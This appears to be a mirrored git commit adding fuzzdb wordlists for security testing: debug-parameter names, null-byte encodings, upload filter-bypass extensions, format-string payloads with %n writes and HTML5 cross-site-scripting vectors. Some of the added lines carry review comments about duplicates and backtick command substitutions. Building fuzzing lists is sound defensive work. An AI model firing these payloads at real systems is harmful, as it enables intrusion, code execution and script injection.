mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 02:53:03 +00:00
Fix #144
parent
f7aa901576
commit
2863f7a588
150 changed files with 133977 additions and 0 deletions
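--- a/attack/business-logic/CommonDebugParamNames.txt
+++ b/attack/business-logic/CommonDebugParamNames.txt
@@ -0,0 +1,40 @@
+7357=1
+7357=true
+7357=y
+7357=yes
+access=1
+access=true
+access=y
+access=yes
+adm=1
+adm1n=1
+adm1n=true
+adm1n=y
+adm1n=yes
+admin=1
+admin=true
+admin=y
+admin=yes
+adm=true
+adm=y
+adm=yes
+dbg=1
+dbg=true
+dbg=y
+dbg=yes
+debug=1
+debug=true
+debug=y
+debug=yes
+edit=1
+edit=true
+edit=y
+edit=yes
+grant=1
+grant=true
+grant=y
+grant=yes
+test=1
+test=true
+test=y
+test=yes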
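--- a/attack/business-logic/CommonMethodNames.txt
+++ b/attack/business-logic/CommonMethodNames.txt
@@ -0,0 +1,40 @@
+get
+put
+send
+delete
+remove
+create
+add
+move
+show
+list
+query
+search
+view
+open
+show
+download
+edit
+change
+alter
+modify
+test
+update
+save
+load
+close
+make
+upload
+rename
+reset
+cancel
+admin
+demo
+verify
+vrfy
+on
+off
+0
+1
+enable
+disable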
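Review bot: `show` is listed twice in CommonMethodNames.txt, once after `move` and again after `open`, so the 40 lines hold only 39 distinct names. A consumer that iterates the list sends the same probe twice, which wastes requests and can double-count hits when results are tallied per line. Drop the second occurrence, or replace it if a different name was intended at that position.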
30
attack/control-chars/NullByteRepresentations.txt
Normal file
30
attack/control-chars/NullByteRepresentations.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
%00
|
||||
\x00
|
||||
\x00\
|
||||
\u0000
|
||||
\u0000
|
||||
\0
|
||||
\0\
|
||||
\00
|
||||
\00\
|
||||
\000
|
||||
\000\
|
||||
\z
|
||||
\z\
|
||||
NUL
|
||||
NULL
|
||||
0x00
|
||||
%00%00
|
||||
\x00\x00
|
||||
\x00\x00\
|
||||
\u0000\u0000
|
||||
\u0000\u0000\
|
||||
\0\0
|
||||
\0\0\
|
||||
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
|
||||
%C0%80
|
||||
%E0%80%80
|
||||
%F0%80%80%80
|
||||
%F8%80%80%80%80
|
||||
%FC%80%80%80%80%80
|
||||
%FE%80%80%80%80%80%80
|
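Review bot: `\u0000` appears on two consecutive lines of NullByteRepresentations.txt (the fourth and fifth entries), so one of them is a duplicate. The neighbouring representations each come as a pair, bare and with a trailing backslash (`\x00` / `\x00\`, `\0` / `\0\`), and the doubled forms further down do include `\u0000\u0000\`, so the second line was probably meant to be `\u0000\`. If that reading is wrong, remove the repeated line instead. As added, a parser that mishandles the backslash-terminated unicode form goes untested.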
10
attack/disclosure-directory/directory-indexing-generic.txt
Normal file
10
attack/disclosure-directory/directory-indexing-generic.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
/%3f.jsp
|
||||
/?M=D
|
||||
/?S=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
/cgi-bin/test-cgi?/*
|
||||
/cgi-bin/test-cgi?*
|
||||
/%00/
|
||||
/%2e/
|
||||
/%2f/
|
||||
/%5c/
|
30
attack/file-upload/alt-extensions-asp.txt
Normal file
30
attack/file-upload/alt-extensions-asp.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
asp
|
||||
aspx
|
||||
asa
|
||||
aSP
|
||||
aSpx
|
||||
aSa
|
||||
asp%20%20%20
|
||||
aspx%20%20%20
|
||||
asa%20%20%20
|
||||
aSP%20%20%20
|
||||
aSpx%20%20%20
|
||||
aSa%20%20%20
|
||||
asp......
|
||||
aspx......
|
||||
asa......
|
||||
aSP......
|
||||
aSpx......
|
||||
aSa......
|
||||
asp%20%20%20...%20.%20..
|
||||
aspx%20%20%20...%20.%20..
|
||||
asa%20%20%20...%20.%20..
|
||||
aSP%20%20%20...%20.%20..
|
||||
aSpx%20%20%20...%20.%20..
|
||||
aSa%20%20%20...%20.%20..
|
||||
asp%00
|
||||
aspx%00
|
||||
asa%00
|
||||
aSp%00
|
||||
aSpx%00
|
||||
aSa%00
|
40
attack/file-upload/alt-extensions-coldfusion.txt
Normal file
40
attack/file-upload/alt-extensions-coldfusion.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
cfm
|
||||
cfml
|
||||
cfc
|
||||
dbm
|
||||
cFm
|
||||
cFml
|
||||
cFc
|
||||
dBm
|
||||
cfm%20%20%20
|
||||
cfml%20%20%20
|
||||
cfc%20%20%20
|
||||
dbm%20%20%20
|
||||
cFm%20%20%20
|
||||
cFml%20%20%20
|
||||
cFc%20%20%20
|
||||
dBm%20%20%20
|
||||
cfm......
|
||||
cfml......
|
||||
cfc.......
|
||||
dbm......
|
||||
cFm......
|
||||
cFml......
|
||||
cFc......
|
||||
dBm......
|
||||
cfm%20%20%20...%20.%20..
|
||||
cfml%20%20%20...%20.%20..
|
||||
cfc%20%20%20...%20.%20..
|
||||
dbm%20%20%20...%20.%20..
|
||||
cFm%20%20%20...%20.%20..
|
||||
cFml%20%20%20...%20.%20..
|
||||
cFc%20%20%20...%20.%20..
|
||||
dBm%20%20%20...%20.%20..
|
||||
cfm%00
|
||||
cfml%00
|
||||
cfc%00
|
||||
dbm%00
|
||||
cFm%00
|
||||
cFml%00
|
||||
cFc%00
|
||||
dBm%00
|
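Review bot: `cfc.......` carries seven trailing dots, while every other entry in the trailing-dot group of alt-extensions-coldfusion.txt (`cfm......`, `cfml......`, `dbm......` and the four mixed-case forms) carries six. This looks like a typo; `cfc......` would keep the group uniform. With the odd count, a different server response on that entry cannot be attributed cleanly to the extension rather than to the number of dots.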
50
attack/file-upload/alt-extensions-jsp.txt
Normal file
50
attack/file-upload/alt-extensions-jsp.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
jsp
|
||||
jspx
|
||||
jsw
|
||||
jsv
|
||||
jspf
|
||||
jSp
|
||||
jSpx
|
||||
jSw
|
||||
jSv
|
||||
jSpf
|
||||
jSp%00
|
||||
jSp%20%20%20
|
||||
jSp%20%20%20...%20.%20..a
|
||||
jSp......
|
||||
jSpf%00
|
||||
jSpf%20%20%20
|
||||
jSpf%20%20%20...%20.%20..a
|
||||
jSpf......
|
||||
jSpx%00
|
||||
jSpx%20%20%20
|
||||
jSpx%20%20%20...%20.%20..a
|
||||
jSpx......
|
||||
jSv%00
|
||||
jSv%20%20%20
|
||||
jSv%20%20%20...%20.%20..a
|
||||
jSv......
|
||||
jSw%00
|
||||
jSw%20%20%20
|
||||
jSw%20%20%20...%20.%20..a
|
||||
jSw......
|
||||
jsp%00
|
||||
jsp%20%20%20
|
||||
jsp%20%20%20...%20.%20..a
|
||||
jsp......
|
||||
jspf%00
|
||||
jspf%20%20%20
|
||||
jspf%20%20%20...%20.%20..a
|
||||
jspf......
|
||||
jspx%00
|
||||
jspx%20%20%20
|
||||
jspx%20%20%20...%20.%20..a
|
||||
jspx......
|
||||
jsv%00
|
||||
jsv%20%20%20
|
||||
jsv%20%20%20...%20.%20..a
|
||||
jsv......
|
||||
jsw%00
|
||||
jsw%20%20%20
|
||||
jsw%20%20%20...%20.%20..a
|
||||
jsw......
|
33
attack/file-upload/alt-extensions-perl.txt
Normal file
33
attack/file-upload/alt-extensions-perl.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# .pm .lib cannot be called directly, must be called as modules
|
||||
pl
|
||||
pm
|
||||
cgi
|
||||
pL
|
||||
pM
|
||||
cGi
|
||||
lib
|
||||
lIb
|
||||
cGi%00
|
||||
cGi%20%20%20
|
||||
cGi......
|
||||
cgi%00
|
||||
cgi%20%20%20
|
||||
cgi......
|
||||
lIb%00
|
||||
lIb%20%20%20
|
||||
lIb......
|
||||
lib%00
|
||||
lib%20%20%20
|
||||
lib......
|
||||
pL%00
|
||||
pL%20%20%20
|
||||
pL......
|
||||
pM%00
|
||||
pM%20%20%20
|
||||
pM......
|
||||
pl%00
|
||||
pl%20%20%20
|
||||
pl......
|
||||
pm%00
|
||||
pm%20%20%20
|
||||
pm......
|
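Review bot: The first line of alt-extensions-perl.txt, `# .pm .lib cannot be called directly, must be called as modules`, is a comment inside a file whose other 32 lines are consumed one value per line. A harness with no `#` handling will submit the whole sentence as an extension and record a meaningless result for it. Move the remark to the directory's documentation, or state once in the project docs that `#` lines must be skipped by consumers. attack/file-upload/invalid-filesystem-chars-osx.txt in this commit has the same issue: two of its three lines are comments.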
60
attack/file-upload/alt-extensions-php.txt
Normal file
60
attack/file-upload/alt-extensions-php.txt
Normal file
|
@ -0,0 +1,60 @@
|
|||
phtml
|
||||
php
|
||||
php3
|
||||
php4
|
||||
php5
|
||||
inc
|
||||
pHtml
|
||||
pHp
|
||||
pHp3
|
||||
pHp4
|
||||
pHp5
|
||||
iNc
|
||||
iNc%00
|
||||
iNc%20%20%20
|
||||
iNc%20%20%20...%20.%20..
|
||||
iNc......
|
||||
inc%00
|
||||
inc%20%20%20
|
||||
inc%20%20%20...%20.%20..
|
||||
inc......
|
||||
pHp%00
|
||||
pHp%20%20%20
|
||||
pHp%20%20%20...%20.%20..
|
||||
pHp......
|
||||
pHp3%00
|
||||
pHp3%20%20%20
|
||||
pHp3%20%20%20...%20.%20..
|
||||
pHp3......
|
||||
pHp4%00
|
||||
pHp4%20%20%20
|
||||
pHp4%20%20%20...%20.%20..
|
||||
pHp4......
|
||||
pHp5%00
|
||||
pHp5%20%20%20
|
||||
pHp5%20%20%20...%20.%20..
|
||||
pHp5......
|
||||
pHtml%00
|
||||
pHtml%20%20%20
|
||||
pHtml%20%20%20...%20.%20..
|
||||
pHtml......
|
||||
php%00
|
||||
php%20%20%20
|
||||
php%20%20%20...%20.%20..
|
||||
php......
|
||||
php3%00
|
||||
php3%20%20%20
|
||||
php3%20%20%20...%20.%20..
|
||||
php3......
|
||||
php4%00
|
||||
php4%20%20%20
|
||||
php4%20%20%20...%20.%20..
|
||||
php4......
|
||||
php5%00
|
||||
php5%20%20%20
|
||||
php5%20%20%20...%20.%20..
|
||||
php5......
|
||||
phtml%00
|
||||
phtml%20%20%20
|
||||
phtml%20%20%20...%20.%20..
|
||||
phtml......
|
|
@ -0,0 +1,9 @@
|
|||
templates_compiled
|
||||
templates_c
|
||||
templates
|
||||
temporary
|
||||
images
|
||||
cache
|
||||
temp
|
||||
files
|
||||
tmp
|
|
@ -0,0 +1,8 @@
|
|||
{ASPSCRIPT}
|
||||
{ASPSCRIPT}.{EXT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.{EXT}
|
||||
{ASPSCRIPT}%00
|
||||
{ASPSCRIPT}%00.{EXT}
|
||||
{ASPSCRIPT}::data%00.
|
||||
{ASPSCRIPT}::data%00.{EXT}
|
58
attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt
Normal file
58
attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt
Normal file
|
@ -0,0 +1,58 @@
|
|||
{ASPSCRIPT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.jpg
|
||||
{ASPSCRIPT};.pdf
|
||||
{ASPSCRIPT};.html
|
||||
{ASPSCRIPT};.htm
|
||||
{ASPSCRIPT};.txt
|
||||
{ASPSCRIPT};.xyz
|
||||
{ASPSCRIPT};.zip
|
||||
{ASPSCRIPT};.tgz
|
||||
{ASPSCRIPT};.doc
|
||||
{ASPSCRIPT};.docx
|
||||
{ASPSCRIPT};.xls
|
||||
{ASPSCRIPT};.xlsx
|
||||
{ASPSCRIPT}%00.jpg
|
||||
{ASPSCRIPT}%00.pdf
|
||||
{ASPSCRIPT}%00.html
|
||||
{ASPSCRIPT}%00.txt
|
||||
{ASPSCRIPT}%00.xyz
|
||||
{ASPSCRIPT}%00.tgz
|
||||
{ASPSCRIPT}%00.zip
|
||||
{ASPSCRIPT}%00.doc
|
||||
{ASPSCRIPT}%00.docx
|
||||
{ASPSCRIPT}%00
|
||||
{ASPSCRIPT}::data%00.jpg
|
||||
{ASPSCRIPT}::data%00.pdf
|
||||
{ASPSCRIPT}::data%00.html
|
||||
{ASPSCRIPT}::data%00.txt
|
||||
{ASPSCRIPT}::data%00.zip
|
||||
{ASPSCRIPT}::data%00.doc
|
||||
{ASPSCRIPT}::data%00.xls
|
||||
{ASPSCRIPT}%00%20%20%20
|
||||
{ASPSCRIPT}%00%20%20%20...%20.%20..
|
||||
{ASPSCRIPT}%00......
|
||||
{ASPSCRIPT}%20%20%20
|
||||
{ASPSCRIPT}%20%20%20...%20.%20..
|
||||
{ASPSCRIPT}......
|
||||
{ASPSCRIPT}::data%00%%20%20%20
|
||||
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..
|
||||
{ASPSCRIPT}::data%00%......
|
||||
{ASPSCRIPT}%00%20%20%20;.jpg
|
||||
{ASPSCRIPT}%00%20%20%20;.doc
|
||||
{ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg
|
||||
{ASPSCRIPT}%00%20%20%20...%20.%20..;.doc
|
||||
{ASPSCRIPT}%00......;.jpg
|
||||
{ASPSCRIPT}%00......;.doc
|
||||
{ASPSCRIPT}%20%20%20;.jpg
|
||||
{ASPSCRIPT}%20%20%20;.doc
|
||||
{ASPSCRIPT}%20%20%20...%20.%20..;.jpg
|
||||
{ASPSCRIPT}%20%20%20...%20.%20..;.doc
|
||||
{ASPSCRIPT}......;.jpg
|
||||
{ASPSCRIPT}......;.doc
|
||||
{ASPSCRIPT}::data%00%%20%20%20;.jpg
|
||||
{ASPSCRIPT}::data%00%%20%20%20;.doc
|
||||
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg
|
||||
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc
|
||||
{ASPSCRIPT}::data%00%......;.jpg
|
||||
{ASPSCRIPT}::data%00%......;.doc
|
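--- a/attack/file-upload/file-ul-filter-bypass-ms-php.txt
+++ b/attack/file-upload/file-ul-filter-bypass-ms-php.txt
@@ -0,0 +1,7 @@
+{PHPSCRIPT}
+{PHPSCRIPT}.phtml
+{PHPSCRIPT}.php.html
+{PHPSCRIPT}.php::$DATA
+{PHPSCRIPT}.php.php.rar
+{PHPSCRIPT}.php.rar
+{PHPSCRIPT}::$DATA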
|
@ -0,0 +1,3 @@
|
|||
%00index.html
|
||||
;index.html
|
||||
%00
|
|
@ -0,0 +1,5 @@
|
|||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
7
attack/file-upload/invalid-filenames-linux.txt
Normal file
7
attack/file-upload/invalid-filenames-linux.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
/
|
||||
|
||||
\0
|
||||
/dev/null
|
||||
/dev/null/foo
|
||||
.
|
||||
..
|
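--- a/attack/file-upload/invalid-filenames-microsoft.txt
+++ b/attack/file-upload/invalid-filenames-microsoft.txt
@@ -0,0 +1,31 @@
+CON.{EXT}
+PRN.{EXT}
+AUX.{EXT}
+CLOCK$.{EXT}
+NUL.{EXT}
+COM1.{EXT}
+COM2.{EXT}
+COM3.{EXT}
+COM4.{EXT}
+COM5.{EXT}
+COM6.{EXT}
+COM7.{EXT}
+COM8.{EXT}
+COM9.{EXT}
+LPT1.{EXT}
+LPT2.{EXT}
+LPT3.{EXT}
+LPT4.{EXT}
+LPT5.{EXT}
+LPT6.{EXT}
+LPT7.{EXT}
+LPT8.{EXT}
+LPT9.{EXT}
+*.{EXT}
+".{EXT}
+[.{EXT}
+].{EXT}
+:.{EXT}
+|.{EXT}
+=.{EXT}
+,.{EXT}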
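--- a/attack/file-upload/invalid-filesystem-chars-microsoft.txt
+++ b/attack/file-upload/invalid-filesystem-chars-microsoft.txt
@@ -0,0 +1,12 @@
+*
+.
+"
+/
+\
+[
+]
+:
+;
+|
+=
+,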
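--- a/attack/file-upload/invalid-filesystem-chars-osx.txt
+++ b/attack/file-upload/invalid-filesystem-chars-osx.txt
@@ -0,0 +1,3 @@
+# list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
+# fuzz these into a filename during upload attempts
+: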
57
attack/format-strings/format-strings.txt
Normal file
57
attack/format-strings/format-strings.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
%s%p%x%d
|
||||
%p%p%p%p
|
||||
%x%x%x%x
|
||||
%d%d%d%d
|
||||
%s%s%s%s
|
||||
%99999999999s
|
||||
%08x
|
||||
%20d
|
||||
%20n
|
||||
%20x
|
||||
%20s
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
||||
%08x.%08x.%08x.%08x.%08x\n
|
||||
XXX0_%08x.%08x.%08x.%08x.%08x\n
|
||||
%.16705u%2\$hn
|
||||
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
|
||||
AAAAA%c
|
||||
AAAAA%d
|
||||
AAAAA%e
|
||||
AAAAA%f
|
||||
AAAAA%I
|
||||
AAAAA%o
|
||||
AAAAA%p
|
||||
AAAAA%s
|
||||
AAAAA%x
|
||||
AAAAA%n
|
||||
ppppp%c
|
||||
ppppp%d
|
||||
ppppp%e
|
||||
ppppp%f
|
||||
ppppp%I
|
||||
ppppp%o
|
||||
ppppp%p
|
||||
ppppp%s
|
||||
ppppp%x
|
||||
ppppp%n
|
||||
%@
|
||||
%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@
|
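Review bot: The two entries in format-strings.txt built around a backtick-quoted `perl -e` command are shell command substitutions, not literal test strings. Sent verbatim they reach the target as the text of a perl command and test no format handling. Worse, a harness that interpolates list lines into a shell command would run perl on the tester's own machine. Storing the expanded text, as the long `%p%p…` entry already does, keeps the file pure data. In the same way, `\n` and `\x10\x01\x48\x08` are escape notations that arrive as literal backslashes unless the consumer decodes them, which deserves a line in the docs.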
142
attack/html_js_fuzz/HTML5sec_Injections.txt
Normal file
142
attack/html_js_fuzz/HTML5sec_Injections.txt
Normal file
|
@ -0,0 +1,142 @@
|
|||
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
|
||||
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
|
||||
<input onfocus=write(1) autofocus>
|
||||
<input onblur=write(1) autofocus><input autofocus>
|
||||
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
|
||||
<video poster=javascript:alert(1)//></video>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
|
||||
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
||||
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
|
||||
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
|
||||
<script>({0:#0=alert/#0#/#0#(0)})</script>
|
||||
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
|
||||
<?xml-stylesheet href="javascript:alert(1)"?><root/>
|
||||
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
|
||||
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
|
||||
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
|
||||
<input onblur=focus() autofocus><input>
|
||||
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
|
||||
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
|
||||
<script src="#">{alert(1)}</script>;1
|
||||
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
|
||||
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
|
||||
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
|
||||
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
|
||||
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
|
||||
<frameset onload=alert(1)>
|
||||
<table background="javascript:alert(1)"></table>
|
||||
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
|
||||
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
|
||||
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
||||
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
|
||||
<!--<img src="--><img src=x onerror=alert(1)//">
|
||||
<comment><img src="</comment><img src=x onerror=alert(1)//">
|
||||
<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
|
||||
<style><img src="</style><img src=x onerror=alert(1)//">
|
||||
<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
|
||||
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
|
||||
<?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html>
|
||||
<style>*[{}@import'test.css?]{color: green;}</style>X
|
||||
<div style="font-family:'foo[a];color:red;';">XXX</div>
|
||||
<div style="font-family:foo}color=red;">XXX</div>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
|
||||
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
|
||||
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
||||
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
|
||||
<x style="behavior:url(test.sct)">
|
||||
<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
||||
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
|
||||
<video><source onerror="alert(1)">
|
||||
<video onerror="alert(1)"><source></source></video>
|
||||
<b <script>alert(1)//</script>0</script></b>
|
||||
<b><script<b></b><alert(1)</script </b></b>
|
||||
